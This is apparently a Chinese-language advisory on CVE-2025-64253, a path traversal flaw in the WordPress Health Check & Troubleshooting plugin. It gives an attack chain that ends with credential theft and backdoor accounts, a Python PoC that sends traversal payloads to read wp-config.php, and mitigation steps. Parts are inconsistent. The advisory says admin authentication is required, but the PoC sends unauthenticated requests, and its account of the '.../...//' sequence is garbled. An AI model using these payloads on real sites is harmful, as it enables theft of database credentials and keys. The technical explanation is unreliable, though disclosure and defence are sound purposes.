CVE-2025-64253 WordPress Health Check插件路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-64253

漏洞类型

路径遍历

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Health Check & Troubleshooting plugin

漏洞概述

CVE-2025-64253是WordPress Health Check & Troubleshooting插件中的一个路径遍历（Path Traversal）漏洞，CVSS评分4.9，属于中等严重程度。该漏洞允许具有高权限的认证用户通过构造特殊的路径字符串'.../...//'来遍历服务器文件系统，访问本不应该被访问的文件。由于该插件用于WordPress网站的健康检查和故障排除功能，通常需要管理员权限才能访问，因此攻击者需要拥有WordPress站点的高权限账户（如管理员）才能利用此漏洞。成功利用此漏洞可能导致敏感文件泄露，包括配置文件、数据库凭证、其他插件的源代码等敏感信息。

技术细节

该路径遍历漏洞源于Health Check & Troubleshooting插件在处理文件路径时未对用户输入进行充分的验证和过滤。攻击者可利用特殊的路径字符串序列'.../...//'绕过基本的安全检查。第一个'..'用于返回上级目录，第二个'..'再次返回上级目录，而'//'可能被某些文件系统解析为无效路径或单斜杠。攻击者通过精心构造的路径请求，可以访问WordPress安装目录之外的文件。例如，攻击者可能尝试访问../../wp-config.php等敏感配置文件。在实际攻击中，攻击者需要通过WordPress后台的Health Check功能模块发起请求，利用该功能读取远程文件或调试信息的特性，结合路径遍历技巧实现任意文件读取。

攻击链分析

STEP 1

信息收集

攻击者首先确认目标网站使用WordPress，并识别安装了Health Check & Troubleshooting插件且版本<=1.7.1

STEP 2

获取高权限账户

攻击者需要获得WordPress站点的高权限账户（管理员权限），可通过暴力破解、凭证填充或社会工程学等方式

STEP 3

构造恶意请求

使用管理员账户登录后，通过Health Check插件的AJAX接口，构造包含路径遍历载荷'.../...//'的特殊请求

STEP 4

绕过安全检查

利用'.../...//'路径序列绕过插件的路径验证逻辑，尝试访问wp-config.php等敏感配置文件

STEP 5

提取敏感信息

成功读取配置文件后，攻击者获取数据库凭证、API密钥、盐值等敏感信息，可用于进一步攻击

STEP 6

持久化控制

利用获取的凭证在数据库中创建后门账户或修改现有账户权限，建立持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64253 PoC - WordPress Health Check Path Traversal
# Affected: WordPress Health Check & Troubleshooting plugin <= 1.7.1

import requests
import sys
from urllib.parse import quote

target = input("Enter target URL: ").rstrip('/')

# Path traversal payloads
payloads = [
    ".../...//wp-config.php",
    ".../...//.../...//wp-config.php",
    "..%2F..%2Fwp-config.php",
    "....//....//wp-config.php"
]

# Try to exploit via Health Check endpoint
for payload in payloads:
    url = f"{target}/wp-admin/admin-ajax.php"
    data = {
        "action": "health_check_get_contents",
        "file": payload
    }
    
    print(f"[*] Testing payload: {payload}")
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200 and "<?php" in response.text:
            print(f"[!] Vulnerable! Found file content:")
            print(response.text[:500])
    except Exception as e:
        print(f"[-] Error: {e}")

影响范围

WordPress Health Check & Troubleshooting plugin <= 1.7.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 暂时禁用或删除Health Check & Troubleshooting插件；2) 限制WordPress管理员账户的创建，确保只有可信人员拥有高权限；3) 使用WordPress安全插件监控异常的AJAX请求；4) 在Web服务器配置中添加URL过滤规则，拦截包含'..'序列的请求；5) 加强WordPress后台登录的二次验证，防止账户被盗用。